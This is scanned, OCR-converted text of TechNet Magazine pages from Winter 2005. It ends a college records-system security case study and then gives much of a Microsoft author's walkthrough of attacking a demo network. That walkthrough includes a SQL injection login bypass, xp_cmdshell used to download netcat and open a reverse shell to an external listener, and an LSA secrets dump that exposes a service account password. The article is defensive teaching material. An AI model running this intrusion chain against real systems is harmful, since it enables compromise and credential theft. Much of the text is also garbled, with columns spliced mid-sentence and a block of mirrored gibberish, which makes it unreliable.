Visual Basic for Applications (VBA) for — 
scripting core and ActiveX’ control data ob- 


jects as the data model. 


Rather than attempt to re-key thousands 
of student records, ATSI leveraged the ex- 
isting data for new purposes. Now the data _ 
is being exported for tasks such as ad hoc © 
reporting, tracking, career counseling, fac- 
ulty visits, surveys, and student interven- 


tion/dropout prevention programs. 


So far, so good. After successful deploy- _ 
ment of the Lehman College SRDS, ATSI 
created a customized version for Bronx | 
Community College. The same interface 
was used, but here the back-end database _ 
was SQL Server 2000. SQL Server was cho- 


sen because it met or exceeded the func- 


tionality the project needed, and it had a | 
lower total cost of ownership (BCC did not 


have an Oracle 9i administrator available). 


22 TechNet Magazine 


resources can be administered (like a Win- 


tool, ATSI found reoccurring flaws in the 


_ were habitually overwritten due to toggling 


between Access and SQL applications. 


Security Issues 

There were several security challenges en- 
countered during the system implementa- 
tion. First, the university network was wide 
open and subject to constant hacking, mak- 
ing confidential student records vulnerable. 
Hacking at the university is pervasive. Stu- 
dent hackers have been able to access confi- 
dential files and in some instances alter the 
data. In other instances, hackers have co- 
vertly installed programs that recorded key- 
strokes as a means to gain access to user 
accounts and even inserted code into VBA 
files that corrupted data. ATSI learned about 
this house-of-cards network when they no- 
ticed that their security files kept disappear- 
ing. When a university VP was affected by 
this hacking, a firewall was finally installed. 

Unfortunately, the new firewall was in- 
stalled directly onto the network without 
testing, or even notifying the application 


_ developers, so network settings including 
the single Access Security Workgroup file 
The primary challenge at BCC arose | 
when ATSI used SQL Server with Microsoft 
Access workgroup security. Within work- 
group networking, shared resources and | 
_ user information are unique to a specific | 
computer and are unavailable to othercom- 
puters. The administrator of a specific com- 
_ university, user accounts were overwritten 
_ when toggling back and forth to other Ac- 
| cess applications. While this can be con- 
- trolled if login information is administered 
- at the SQL Server level, in practice it wasn’t 
_ because the IT department had no one 
_ serving as an applications administrator. 
_ Therefore, logins were managed by local 
admins as a Client Zone requirement. 
(Oracle accounts, on the other hand, are 
_ centrally managed by a database adminis- 
- trator in this site.) 
puter must maintain users, shares, and per- 
missions at the local level, as opposed to 
usinga centralized location where usersand — 


shared by both colleges were set back to 
their defaults. Additionally, Microsoft VBA 
Security Update MS03-037 was installed, 
thwarting some hacks but also disabling 
some expected functionality. 

Since the colleges were using the same 
Access Security Workgroup for the entire 


At both Lehman and BCC, the general 
practice has been to rely upon Windows 
Authentication and the Access system 


_ workgroup default file for security in the 
dows NT® Server domain). While work- | 
_ group security has evolved over the years _ 
_ into a stable security account management _ 


login process for all SQL Server and Access 
apps. Not only are system security 
workgroups unmanaged, but this mixture 


_ of systems combined to cause a bigger prob- 
' security architecture where user accounts | 


lem: users who accessed different systems 


found that their account information (user 
name and password) was overwritten, mak- 
ing the system inaccessible to them. 

This problem was discovered when 
troubleshooting one of the affected work- 
stations. A review of the system properties 
revealed that the path of the security file 
had been altered to coincide with the sys- 
tem default file. This was fixed by modify- 
ing the application code to point to a 
different security file location, and then 
placing an SRDS application icon, point- 
ing to the correct security file, on each user's 
desktop. Since Lehman and BCC did not 
employ any network management software, 


push technology, or imaging, ATSI ended | 


up applying the fix on each workstation one 
at a time. Now, when the network infra- 
structure changes or implodes, the applica- 
tion will still work. 

The original system was launched with- 
out any definition of user roles and per- 
missions. When the project group launched 
the application, they had no idea how much 
it would open the lines of communica- 
tion—almost too much, as it turned out. 

The user team soon realized that they 
needed to define roles and permissions as 
an important part of the workflow. As an 
example, an economics professor should be 
able to update information about a student 
in her class, but not be able to see all the 
student's records. 


The application was locked down after a 


review with the user team. The review re- 


www.technetmagazine.com 


sulted in advisors being linked only to their 
assigned students and faculty receiving ac- 
cess only to student records pertaining to 
their particular classes. 

To secure the entire object model, devel- 
opers set access at the account level, per- 
missions on the object side, roles and 
privileges in Oracle, and workgroups in Ac- 


Legacy system data has been turned into 
information that the SRDS user commu- 
nity can build upon for their own student 
tracking and retention workflow and busi- 
ness processes. The application now func- 
tions well despite the dysfunctional network 
on which it resides. In an ideal environ- 
ment, Access security workgroups would 


if hackers break into the system at any point, 
they are now denied access to the application 
itself and can no longer alter its code. 


cess. Each entry made in the Access secu- 
rity file required matching accounts in 
Oracle and Access before the application 
would launch. A user account table was cre- 
ated to centrally store user information and 
active/inactive status. The system access 
process is coded so that if one entry in the 
table is off, the user is terminated without 
access to the application. This may have 
been the biggest step of all; if hackers break 
into the system at any point, they are now 
denied access to the application itself and 
can no longer alter its code. 


Outcome 

This project had a very happy conclu- 
sion as users have productively used this 
system for nine months and new function- 
ality is being developed on top of the more 
secure framework that was put in place. 


not be used for login security. Centrally lo- 
cated and administered applications would 
eliminate the kind of security file conflicts 
that were encountered by ATSI and the 
SRDS project team. 

Because of improvements in workgroup 
security features in Access, the security 
requirements that used to require hard cod- 
ing can now be performed by administra- 
tors. The ease of use is similar to that which 
SQL Server and Oracle offer. There are still 
some places where Access security should 
continue to improve. For instance, it is not 
easy to toggle between security files with- 
out hard coding. Perhaps an improvement 
will come in the form of a database prop- 
erty that would allow you to marry the ap- 
plication to the security file and then take it 
back to the system default without having 
to do it at individual workstations. e 


Winter 2005 23 


Hacking: Fight Back 


Jesper Johansson 


Flow a Criminal 


* Paths hackers can use to 
infiltrate networks 


¢ What patching and version 
states reveal 


¢ IIS and SQL injection attacks 


e The dangers of elevated 
privileges 


AT A GLANCE 


Jesper Johansson is a Security Program Manager with 
Microsoft, fociising on how customers should best 
deploy Microsoft products more securely. He has a 
Ph.D. in MIS and has delivered speeches on security at 
conferences all over the world. 


This article is an excerpt from an upcoming book by 
Jesper Johansson and Steve Riley. 


24 TechNet Magazine 


Sht infiltrate 
Your Network 


One of the great mysteries in security management is the 
modus operandi of criminal hackers. If you don’t know how 
they can attack you, how can you protect yourself from them? 


Prepare to be enlightened. 


This article is not intended to show you how to hack something, but rather to 
show how attackers can take advantage of your mistakes. This will enable 
you to avoid the common pitfalls that criminal hackers exploit. 

Before I get started, there are several things you need to know about pen- 


etration testing. First of all, a penetration 
test gone wrong can have dire conse- 
quences for the stability of your network. 
Some of the tools used by hackers (crimi- 
nal and otherwise) are designed to probe 
a network for vulnerabilities. Hacking 
tools and exploits used against a system 
can go wrong, destabilize a system or the 
entire network, or have other unintended 
consequences. A professional knows 
where to draw the line and how far she 
can push the network without breaking it. 
Anamateur usually does not. 

A healthy infusion of paranoia tends to 


_ be remarkably useful when protecting net- 
_ works. One of the worst mistakes a security 
_ administrator can make is to assume ev- 
_ erything is OK. Be aware of the mythical 
- “your network is secure” statement. With 
_ alarming frequency, security consultants 
_ will leave you with a report that claims that 
_ your network is secure, based on the fact 
_ that they were unable to get into anything. 
_ This certainly does not mean your network 
- issecure! It only means they couldn't finda 
_ way to break it, but someone else still could. 


: Target Network 


Most networks today are built on what is 


called the eggshell principle: hard on the 
_ outside and soft on the inside. This means 
that ifan attacker can gain a foothold onto 


the network, the rest of the network will 
usually fall like dominoes. Once inside, the 
most difficult part is often to figure out what 


to attack next and where to go for the really — 
juicy bits of information. It does not have | 
to be this way. With the proper techniques, _ 
we as network administrators can achieve — 


two crucial objectives: to make it much 
more difficult to gain a foothold in the first 


place and to make it much more difficult to _ 


use that foothold to get anywhere else on 
the network. 

Before I start attacking the target net- 
work, let’s take a look at what I’m up against. 


Obviously, a real attacker going after a real 


network would rarely have access to com- 


plete network diagrams, but in my case it is _ 
enlightening to look at the configuration of 


the target network (see Figure 1). 

As Figure 1 shows, my target network isa 
standard dual-screened subnet with a 
firewall at the front and at the back. The 


perimeter network has a pretty common — 
setup with a front-end Web server, a back- 
end database server, and a demilitarized — 


zone (DMZ) domain controller (DC). 


Network address ranges 

Host names 

Exposed hosts 

Applications exposed on those hosts 
Operating system and application ver- 
sion information 

Patch state of both the host and of the 
applications 

Structure of the applications and back- 
end severs 

So let’s take a look at what kinds of infor- 


_ how the typical hacker can find that im- 
portant information. 


Network Address Ranges and 


_ Host Names 


The next step in a good hack is to find 


the logical locations for the networks of in- 
_ terest. Say I’m performing a penetration test 
_ of contoso.com. I would start out by look- 
' ing up what networks are registered to 
' contoso.com. Perhaps even more interest- 


ing than the publicly registered address 


_ ranges for contoso.com is any information 
on networks connected to the target net- 
- mation an attacker can obtain and learn — 
_ partner. It’s often easier to attack poor- 
' security.com and take over that domain be- 


work, such as an extranet or a business 


Internet 


There is a corporate DC on the back end, © 
and the attacker's end goal is to take control 


of that DC. 


Perhaps the only unusual aspect of this 
network is the fact that the Web server and | 
the DMZ DC are both serving as routers. © 
This is actually an artifact of how this sce- 
nario was constructed. The network in | 
question was built as virtual machines run- 
ning in Microsoft" Virtual PC 2004 so that 


Ican carry the network with me and use it 
for demonstrations. Realistically, I can only 
run two virtual machines per host com- 


puter. To run the entire network I need half 
as many hosts as I need guests. Had I built 
this with separate routers I would have | 
needed three laptops (or one more thanT'd 
ever want to carry). To that end, the Web — 
server and DMZ DC are both serving as 
routers to reduce the number of host ma- 
chines needed. I assure you, this somewhat | 
unorthodox configuration has no bearing — 


on what is to come. 


The first step in hacking any network is — 
to figure out what to attack—to develop a_ 
footprint of the target network. Some of 
the things it is useful for a criminal hacker — 


to learn include: 


www.technetmagazine.com 


| Figure 1 Target Network 


—— Firewall 


Web Server 


192.168.2.30| 


172.17.0.1 


VVZMN UO 


Winter 2005 25 


fore jumping from there to contoso.com. 
Like links in a chain, a network is only as 
secure as the least secure network connected 
to it (including all the VPN users connect- 
ing into it). 

The next thing the attacker needs is host 
names. In some cases, it is possible to per- 
form nslookup requests on large swaths of 
the network and it may even be possible to 
perform something called a zone transfer. 
Azone transfer is simply a request toa DNS 
server to send back a copy of an entire DMZ 
zone (a listing of all the registered names in 
the network). While host names are not 
critically important to most attacks, they 
can make an attack much simpler. For ex- 
ample, if you have the hostname of a Web 
server running IIS, you can deduce the 
anonymous IIS account for that host, since 
it is usually called IUSR_hostname. Now 
let’s assume that the administrator has con- 
figured account lockout on that system. All 
an attacker has to do to take down that Web 
server is to send a large number of requests 
to the server asking it to authenticate you as 
IUSR_hostname. In short order the attacker 
can send enough bad passwords to lock out 


26 TechNet Magazine 


the anonymous user account. Once that ac- 
count is locked out, the attacker can just 
keep sending enough bad requests to keep 
it that way and this Web server will no longer 
serve anything to anyone. 


More interesting than host names are the 
hosts that are actually exposed. In this phase 
of the attack, I am trying to locate easy tar- 
gets. Doing so may be absolutely trivial. You 
may not even need any hacking tools, as 
long as Internet Control Message Protocol 
(ICMP) traffic is not blocked at the border. 
In that case, the following command is per- 
fectly sufficient: 


c:\discoverHosts 192.168.2 
192.168.2.30 


Obviously, the IP address at the end would 
need to be adjusted to the appropriate tar- 
get range. All I am doing here, however, is 
sending an ICMP echo to each host on a 
particular network. If ICMP traffic is not 
blocked, you just sit back while your net- 
work generates a list of valid addresses. 

In the vast majority of cases, ICMP traf- 


How to Get a Hacker Out of Your Network 


fic should be sent to /dev/null at the border. 
Even a half decent firewall should block 
ICMP, but it is surprising how often ad- 
ministrators forget to ensure that it is actu- 
ally disabled. No response should even be 
sent. While this does not really stop enu- 
meration, it makes it marginally more diffi- 
cult since the attacker needs to rely on 
custom tools, such as port scanners. 

A port scanner is simply a tool that at- 
tempts to connect to a target and report 
whether it was successful or not. A success- 
ful connection means the host is listening. 
An unsuccessful connection usually means 
it is not. The most common type of port 
scan is known as a SYN scan, where the 
attacker attempts to establish an ordinary 
connection to the target. If a host is listen- 
ing, the connection will be successful and 
the port scanner will notify the attacker that 
a port is open. You can port scan an entire 
network in short order. Doing so on a range 
of well-chosen ports can give youa tremen- 
dous amount of information about what is 
available on the network. 

Port scanning is the way to determine 
what applications are exposed on a host. 


This allows us to get information on pos- 
sible vectors for attack. Some of the appli- 
cations commonly looked for include the 
FTP clients and servers, Telnet, mail serv- 
ers,and HTTP Web servers. 


If you can, it is very useful to get infor- 
mation on the version of the applications 
that we find running on a target machine. 
For example, many applications have some 
kind of banner that is sent as soon as some- 
one connects. Most SMTP and POP serv- 
ers as well as many Web servers are 
configured to do this. In our case, however, 
the target network is running IIS 6.0 on 
Windows Server™ 2003, and IIS 6.0 does 
not senda banner with any usable info. 

It is also very interesting to an attacker to 
find out what patch state the exposed serv- 
ers are in. This information can be found in 
a variety of ways. In some cases, the ban- 
ners presented by the applications will tell 
you all you need to know. For example, 
sendmail banners usually tell you the ver- 
sion number of the daemon. If you know 
which version of sendmail still exposes cer- 


www.technetmagazine.com 


tain vulnerabilities, you have all the infor- 
mation you need. In other cases, you can 
figure out whether it has a particular patch 
or not from the responses the system is giv- 
ing you. This is essentially the technique 
used in good vulnerability scanners and in 
OS fingerprinting tools. Asa last resort, you 
can always fire off an exploit against a sys- 


out. For example, let’s assume you have a 
target network that uses a particular third- 
party Web application with very distinct 
file names and page designs. In this case, it 
is often obvious to the attacker which ap- 
plication you are using. If the attacker is 
familiar with the application, she may know 
how to exploit it. For instance, the applica- 


A port scanner is simply a tool that attempts 
to connect to a target and report whether it 
was successful or not. A successful 
connection means the host is listening. 


tem and see what happens. This is often 
how vulnerability scanners look for denial 
of service attacks. If the system still re- 
sponds after the attack it was most likely 


not vulnerable! 


It is often very helpful to get information 
about the structure of the application and 
back-end server(s), if any. This is usually 
very difficult, but in some cases you luck 


tion may use a configuration file called 
%webroot%\system.contig. If files with the 
.config extension are not parsed by the Web 
server, the attacker can simply request this 
file in a Web browser. In a best-case sce- 
nario, that file will only give her informa- 
tion such as the names of the back-end 
servers and databases. In the worst-case sce- 
nario, that file will contain the user name 
and password used to actually establish the 
connection between the Web server and a 
database server. 


Winter 2005 27 


-———-———— 


Welcome to the pubs ordering system 


You must login to start 
Username: | 


Password: | 


Figure 2 Contoso.com Homepage 


Do not dismiss this as a contrived ex- 
ample. | encountered this exact situation 
just a few months ago as I was looking at a 
customer's network to see whether there was 
anything at all that could be done to im- 
prove security. A very large number of com- 
mercial Web applications are extremely 
poorly written, essentially 
turning them into backdoors 
into the network. 

At this point, I have just 
about all the information I 
need to start hacking. The first 
step is to establish an initial 
foothold into the network, to 
pierce the eggshell, if you will. 


Initial Compromise 
Let's assume I’ve done some 
initial probing and know that 
the target network is fully patched and that 
there is a really tight firewall in front, only 


allowing traffic on ports 80 and 443 (the — 
defaults for HTTP and HTTPS); where do | 


I go from here? Remember what I said about 
backdoors. Where could the backdoor be? 


What am I up against? The first step is to 


look at what is exposed to me: a Web appli- 
cation. Figure 2 shows the Web server 
homepage. From this screen, I can tell that 


this is obviously an ordering site of some — 
kind. Let’s use a legitimate account to find | 


out more about it. 
The next page shows the Pubs bookstore 


and lists books for sale. They display my 


username on the page. This could come in 
handy if they are not careful, because I can 


use it to validate certain other techniques. © 


For example, I have a hunch that this site 
uses a pretty poor algorithm for checking 


whether users have entered the right © 


username or password (pretty shrewd, con- 
sidering I wrote the algorithm!). I am also 


28 TechNet Magazine 


curious whether they are properly validat- 
ing the input from the username fields. To 
find out for sure, I’m going to use a tech- 


_ nique called SQL injection. Using a SQL 


injection attack, I pass the following string 
foo’ OR I=1;-- 
in the username field. This yields the result 
shown in Figure 3. 

In Figure 3, you can see 
that not only do I get logged 
on, but the application also 
displayed the fake username 
I sent it on the homepage. 
This latter artifact is actually 
a separate type of vulnerabil- 
ity known as a cross-site 
scripting (CSS) vulnerability, 
where the user input is ech- 
oed directly to the screen 
without sanitizing it first. 


ey Available Titles - Microsoft Internet Explorer 


: File Edit View Favorites Tools Help 


Ze 


a 


| isn’t a user called foo OR 1=1;--. The ap- 


plication is very poorly written. It assumes 
that if any results come back from the data- 
base when it asks for a user with a particu- 
lar password, then the username and 
password combination is obviously valid, 
and therefore it should log on this user. The 
SQL injection attack effectively rewrote the 
database query to include the statement OR 
1=1. Since 1 is always equal to 1, this evalu- 
ates to true, which means the entire query 
evaluates to true for all records in the data- 
base. This will return every user account in 
the database, which means the application 
thought I was logged on. 

I can now send arbitrary commands to 
the back-end database server. I am going to 
use that capability in an elevation of privi- 
lege attack to get the database server to run 
commands for me. 


Elevating Privileges 

As you saw earlier, the database server is 
not directly accessible from the Internet, 
and the front-end Web server is fully 
patched and not vulnerable to any known 
attacks. The objective at this point is to el- 
evate my privileges so that I become an in- 
ternal user, preferably a highly privileged 
one, on one of the systems in the target net- 


' work. To do that, Pll use SQL injection to 
So how was I logged on? There obviously | 


send commands to the database server and 


Protecting Your Network 
The Busy Executive's Database Guide 


Cooking with Computers: Surreptitious Balance Sheets 


You Can Combat Computer Stress! 
Straight Talk About Computers 
Silicon Valley Gastronomic Treats 
The Gourrnet Microwave 

But Is It User Friendly? 

Secrets of Silicon Valley 

Net Etiquette 


Computer Phobic SND Non-Phobic Individuals: Behavior Variations $21.59 Karsen 


$34.95 Johansson 
$19.99 Bennet 
$11.95 MacFeather 
$2.99 Green 
£19.99 Straight 
$19.99 del Castilla 
$2.99 DeFrance 
$22.95 Carson 
$20.00 Dull 
Locksley 


Is Anger the Enemy? 
Life Without Fear 
Prolonged Data Deprivation: Four Case Studies 
Emotional Security: A New Algorithm 
< 


£10.95 Ringer 
$7.00 Ringer 
$19.99 White 


$7.99 Locksley ¥ 
> 


@ Internet 


Figure 3 SOL Injection (and Cross-Site Scripting) at Work 


FGI 


YM omess yn “sasbuy 671 |7y ofieaua  ¥5 ‘Oasys: ues | 1L “Seung [vO Raley LonPa Oo ‘vouaEaM AN SFt9A $¢7} 90 ‘290900 IWS ‘DOaG Urs [HO squIIoD | Sate DOA Mant 14 SeROORET 
Bue UOHBOADT (ODRUS |: sayin queen | panies 


solsue104 Jajndwo9 pailddy - apg eindeS BUA, _ =.=. di SS Fore rc 
J j2udissajOld Ce MmeS EGON VILEOD 999 —YOso2IW YOsolIy Hi) 


lenwues junsas 2 ail098q “yori UESS Arr sessptite ranethg: 
ASOLU SISIIELU UOIUM JEU) oaloud nue AjuNndeS uoeo.dde nos Aem au} 
» uioiBaiens sioul awoseg ‘SIUQLUUOJIAUS HulWed7] SuUllUO SAK pue 
© por JOINNSU} |eUONIpe) Ui GuitiemarAs-duues jooq oibayens Buuisiio 
fuego) pues Munaes-9 if haleio|eo0e [4 aut SI |OOUIS SSUSlU} 


" </eINWeS A}LUNIIS 


“g 


FOOT Sulmery, poseg-rioqnduro; 3sog | 
¥OOT BF C007 Surutery, poTropnasuy 489 


7007 78 €00T dureD 100g Isog 


vonDrYIJaD 
9 Buyuyoy 1} 


Figure 4 Localhost Dumpinfo 


C:\warez>dumpinfo 127.0.0.1 
The Administrator is: | PYN-SQL\Administrator 


Users on PYN-SQL: 


RID 1000 PYN-SQL\TsInternetUser a User 
RID 1001 PYN-SQL\SQLDebugger a User 
Share Type Comment 

IPC$ Unknown Remote IPC 
ADMINS Special Remote Admin 
C$ Special Default share 
Administrators: 


PYN-SQL\Administrator 
PYN-DMZ\_ids 
PYN-DMZ\Domain Admins 


ask it to do things for us. Note that I cannot | 


connect directly to the database server, so 


instead I will ask it to make a connection to | 


me. I’ll begin by setting up a listener on the 
external network, and then I will make the 
database server connect to me. 

Before I can command the database 


server, I need to get some tools onto the | 


Web server to further the attack. This is im- 
portant because, generally speaking, hack- 
ing tools are not installed on the operating 
system by default. To get them up there 


primarily for booting diskless workstations. 
The client application for TFTP is installed 
on all Windows systems by default (with 
the exception of Windows Server 2003 Ser- 


vice Pack 1 and later), so unless you have © 


removed it, it is still there and available. 
Since I have a SQL injection vulnerability, 


database server. Netcat is a network tool 
somewhat like telnet, except that it is unau- 
thenticated and much more versatile. It is 
freely available on the Internet and even 


comes standard on many UNIX and Linux | 
distributions. It is pretty much universally — 


used by attackers, however, and should 


never be left on a system where it is not 


absolutely needed. 
The attack works by calling the xp_cmd- 
shell stored procedure. Installed by default 


on SQL Server", xp_cmdshell is used to ex- 
ecute commands on the underlying oper- 
ating system. I will simply use this — 
procedure to run TFTP and upload my | 


tools to the database. xp_cmdshell is rarely 


30 TechNet Magazine 


needed in most deployments and can be 


disabled in several ways to protect against 
_ exactly this kind of attack. Once I’ve up- 
| loaded netcat, | tell netcat to create a socket, 
and then I pass that socket as stdin, stdout, 


and stderr ina call to cmd.exe. This sounds 
complicated, but it works reliably. The re- 


: sultisan outbound connection where I pipe 
; acommand shell over a socket. I now have | 
/ my remote command line: 


c:\dne -1 -p 12345 
Microsoft Windows 2000 [Version 5.00.2195] 
(C) Copyright 1985-2000 Microsoft Corp. 


C:\WINNT\system32>hostname 
hostname 
PYN-SQL 


At this point, I have established my first _ 
foothold and am well on the way to taking — 


over the network. I have escalated privileges 
from a remote anonymous user to an in- 
side user. To find out what kind of user, I 


' need to first get the rest of my tools onto 
the system. Those tools will be used to es- 


calate local privileges if needed as well as to 
hack the rest of the systems on the network. 
I can transfer those, too, using tftp.exe. 
Once I’ve done that, J can verify my cre- 


aaa ' dentials on the host: 
you can use Trivial File Transfer Protocol 


(TFTP), a connectionless protocol used | 


C:\warez>whoami 
whoami 
NT AUTHORITY\SYSTEM 


Bingo! I’m already LocalSystem. That 
must certainly mean that SQL Server ran 


| xp_cmdshell as LocalSystem, and that I 
have completely compromised the back- 
_ look for the easy exploits. Perhaps the sim- 


end database server. I can now proceed to 


_ hacking other machines on the network. 
I can use it to command the database server | 
to use TFTP to download netcat to the | 


Hacking Other Machines 
I have now pierced the eggshell. At this 


| point, the objective is to fully “own” the net- 
_ work and take over everything else. Before 


I really get going, let’s get some more infor- 
mation on my target using the dumpinfo 
utility, shown in Figure 4. dumpinfo is a 
custom tool that enumerates information 
from a system over a null session. A null 


| session isan anonymous connection—one 


made without any authentication. 
From this I can learn that there is not 
much on this system; it looks rather like a 


Netcat is a network 
tool somewhat like 
telnet, except that it 
is unauthenticated 
and much more 
versatile. 


default system. Before I proceed with using 
this information, let’s figure out the lay of 


_ the land. Shown in Figure 5, invoking ip- 


config.exe tells me my IP address and con- 


_ figuration. Notice that the machine has a 
_ private address so my connection must be 


going through a NAT router at 172.17.0.1. 
This information will also be useful later. 
Now, let’s get hacking again. 

The first thing the attacker does now is 


plest is to use shared service accounts, if 


Figure 5 lpconfig Output for PYN-SOL 


C:\warez>ipconfig /all 


Windows 2000 IP Configuration 


HOSE NAMIC: os ter aecae a Seca caoete nee eee : PYN-SQL 
Primary DNS Suffix ... 2... : PYN-DMZ.LOCAL 
Node-Typé s a. 26 24s eae 3 Mixed 

IP Routing Enabled. ....... : NO 

WINS Proxy Enabled. .......: No 

DNS Suffix Search List. . . . . . : PYN-DMZ.LOCAL 


Ethernet adapter Local Area Connection: 


Connection-specific DNS Suffix 


Description. .......... 1: Intel 21140 Based PCI Fast Ethernet Adapter 
Physical Address... .... . . : 00-03-FF-03-3E-FO 

DHCP Enabled. «1 ss ss «a ey Y NO 

GP AGUTESS: « ako ea aca th TRIO 

SUDNCESMASK: 3 5 cer Gi ak Ye oe ae cele ae tee 252550 

Default Gateway... ...... : 172.17.0.1 

DNSOSERVERS: us ae 4 we. Hate oe on Ae SOUR 082 


Figure 6 Listing Local Admins 


C:\warez>net localgroup administrators 

Alias name administrators 

Comment Administrators have complete and 
unrestricted access to the 
computer/domain. 


Members 


Administrator 

PYN-DMZ\Domain Admins 

PYN-SQL\Administrator 

PYN-DMZ\_ids 

The command completed successfully. 

The _ids account is a domain account; and it 
is a local administrator. 


present. Shared service accounts are an easy 
vector because the easiest way to configure 
services on multiple systems is to use do- 
main accounts to run those services under, 
and then configure services on many sys- 
tems to run with the same accounts. Alter- 
natively, in some environments, local 
accounts are used, but the credentials match 
those on other systems. This means that if 
we find any services running in regular user 
accounts (as opposed to system accounts 
such as LocalSystem, NetworkService, and 
LocalService) it’s likely that they are used 
on multiple systems. 

To find out whether this is a viable vec- 
tor, let's check who is running services on 
the database server I am on. To do that, I 
use a tool designed for that purpose: 

C:\warez>serviceuser \\PYN-SQL 

10S 

PYN_OMZ\_ids 

As you can see, there isa domain account 
used for the IDS service (presumably the 
Intrusion Detection Service). To find out 
whether it is truly useful, let’s learn more 
about the account using the net command. 
You can see the output in Figure 6. 


Figure 7 Lsadump Output 


C:\warez>1sadump2 

$MACHINE.ACC 

13 FE 4C 3A 04 F8 1F 94 75 C8 9B OB 1C 35 45 7A 
52 7E 25 DF F8 17 F2 96 3A 35 81 C7 
DefaultPassword 

DPAPI_SYSTEM 

01 00 00 00 C8 AA F8 8C 36 C7 69 CC DD 42 CB 15 
3F 4£ 07 6D 48 05 OA 4C FE 31 87 C9 F2 58 A3 AD 
B7 AD 13 20 26 11 24 24 FF 79 AE D3 


SC_IDS 
69 00 64 00 73 00 50 00 61 00 73 00 73 00 77 00 
64 00 21 00 


www.technetmagazine.com 


eS sPaaeiseiSiawe 
de. 


It would of course be preferable if this 
was a domain account, but I'll take what I 


' can get. To understand what you can do 
' with this account, you need to know a little 
/ more about how Windows’ operates. Ser- 
| vices are applications that run when the sys- 


tem boots. Just like any other process on 
the system, services must run under some 
kind of user identity. When the service 
starts, the operating system will authenti- 


~ cate the account used for the service. To do 


this, it needs a username and password, 
which is stored in the Local Security Au- 
thority (LSA) Secrets. The LSA Secrets are 
maintained by the LSA to hold certain sen- 
sitive information, such as the computer ac- 
count credentials, encryption keys, and 
service account credentials. 

The LSA Secrets are encrypted on disk 
and decrypted by the OS when the ma- 
chine boots. They are then held in clear text 
in the LSA process memory space while 


the system is running. To get at this infor- 


Figure 8 Gateway Dumpinfo 


C:\warez>dumpinfo 172.17.0.1 


Unable to look up the local administrator 
Unable to enumerate users because I could not 
get the Admin Sid 


Share Type Comment 

1PC$ Unknown Remote IPC 
ADMINS Special Remote Admin 
wwwroots Disk 

C$ Special Default share 
Administrators: 


Unable to enumerate administrators 
ERROR: Access Denied 


the right to attach a debugger to it, whether 
Thave the privilege or not. 

The output of running Lsadump, shown 
in Figure 7, has been truncated to make it 
easier to read, but the really interesting piece 
is right at the end, where the service ac- 
count credentials are listed. As you can see, 
the right-hand column holds the service 
account password. I now know that there is 


LSA Secrets are clear text in the LSA process 
memory space while the system is running. 


mation, the hacker must hook a debugger 
to the LSA process. That may sound daunt- 
ing, but there are utilities designed specifi- 
cally for this purpose. Note that the LSA is 
running as LocalSystem, so not just anyone 
can attach a debugger to a process running 
as LocalSystem. Doing so would be a seri- 
ous security breach and violate all kinds of 
security models. However, any user who has 
the SeDebugPrivilege can do so. By default, 
this means only the Administrators are able. 
Since Administrators can do whatever they 
want anyway, this is nota security problem. 
They own the system with- 
out that privilege, and can 
grant themselves the privi- 
lege if they want. The prob- 
lem comes when untrusted 


oletacataridl sere Ez 
RB Be users have that privilege. In 
my case, I don’t have to 
soni 6.i..B... worry about that because 
IN.mH. .L.1...X i ae 
ee my remote shell is running 


as LocalSystem. In other 
words, | am running as the 
same identity as the LSA 
process, and therefore have 


a user called _ids, and that it has a pass- 
word of “idsPasswd!” (the output is in Uni- 
code, hence the dots in between, signifying 
nulls). The only thing left now is to find out 
where to use this account. By pinging all 
the hosts on the subnet, | find that there are 
only two other machines on this subnet, 
172.17.0.1 (the gateway) and 172.17.0.2 
(the DNS server). I suppose I should figure 
out a little bit more about each of them. To 
do that, I use dumpinfo again. By default, 
some Windows systems give out more in- 
formation than others over a null session. 
Figure 8 shows some typical information. 
I'm not getting very much info on this 
system because it isa Windows Server 2003 
member server. Note that on Windows 
Server 2003 standalone and member serv- 
ers, null session users will only be able to 
list the shares on the system, not the user 
accounts by default. You can tell from the 
dumpinfo output, however, that the default 
gateway is running a Web server, based on 
the fact that it exposes a wwwroot$ share. 
Notice that I do get a list of all the so-called 
hidden shares (shares postfixed with a $). 


Winter 2005 31 


Figure 9 DNS Server Dumpinfo 


C:\warez>dumpinfo 172.17.0.2 
The Administrator is: PYN-DMZ\Administrator 


Users on PYN-DMZ-DC: 


RID 1000 PYN-DMZ\HelpServicesGroup an Alias 
RID 1001 PYN-DMZ\SUPPORT_388945a0 a User 
RID 1002 PYN-DMZ\TelnetClients an Alias 
RID 1003  PYN-DMZ\PYN-DMZ-DC$ a User 
RID 1104 = PYN-DMZ\DnsAdmins an Alias 
RID 1105 PYN-DMZ\DnsUpdateProxy a Group 
RID 1106 = PYN-DMZ\FAjenstat a User 
RID 1107 PYN-DMZ\AAlberts a User 
RID 1108 PYN-DMZ\HAcevedo a User 
RID 1109 PYN-DMZ\MAlexander a User 
RID 1110 PYN-DMZ\KAkers a User 
RID 1111 PYN-DMZ\TAdams a User 
RID 1112 PYN-DMZ\KAbercrombie a User 
RID 1113 PYN-DMZ\Sculp a User 
RID 1114 PYN-DMZ\SAbbas a User 
RID 1115 = PYN-DMZ\MAl1en a User 
RID 1116 = PYN-DMZ\JAdams a User 
RID 1117 PYN-DMZ\SAlexander a User 
RID 1118 —PYN-DMZ\HAbolrous a User 
RID 1119 — PYN-DMZ\PAckerman a User 
RID 1120 PYN-DMZ\GAlderson a User 
RID 1121 PYN-DMZ\PYN-SQL$ a User 
RID 1122 PYN-DMZ\PYN-WEB$ a User 
RID 1123 PYN-DMZ\_IDS a User 
Share Type Comment 

IPC$ Unknown Remote IPC 

NETLOGON Disk Logon server share 
ADMINS Special Remote Admin 
SYSVOL Disk Logon server share 
C$ Special Default share 


Administrators: 
Unable to enumerate administrators 
ERROR: Access Denied 


The dollar sign is just a notification to the 
client-side of the API not to display this 
item. The dumpinfo tool ignores that noti- 
fication and displays the item anyway. 

It would also be helpful to find out what 


services are available on this system. This | 


information will tell you the type of con- 
nections that you can make to it. To do that, 
let’s turn to the portscanner: 


C:\warez>portscan 172.17.0.1 
Port 172.17.0.1:80 open 

Port 172.17.0.1:135 open 
Port 172.17.0.1:139 open 
Port 172.17.0.1:445 open 
Port 172.17.0.1:3389 open 


This really doesn’t tell me much, but it does 


verify that Iam allowed to make SMB (ports 
139 and 445) and Terminal Services con- 
nections (port 3389) to the gateway/Web 
server. This will be highly useful for fur- 
thering the attack in just a moment. 

For now, let’s take a closer look at the 
other system on the network, whose 
dumpinfo results are shown in Figure 9. 


The machine must be a domain controller 


32 TechNet Magazine 


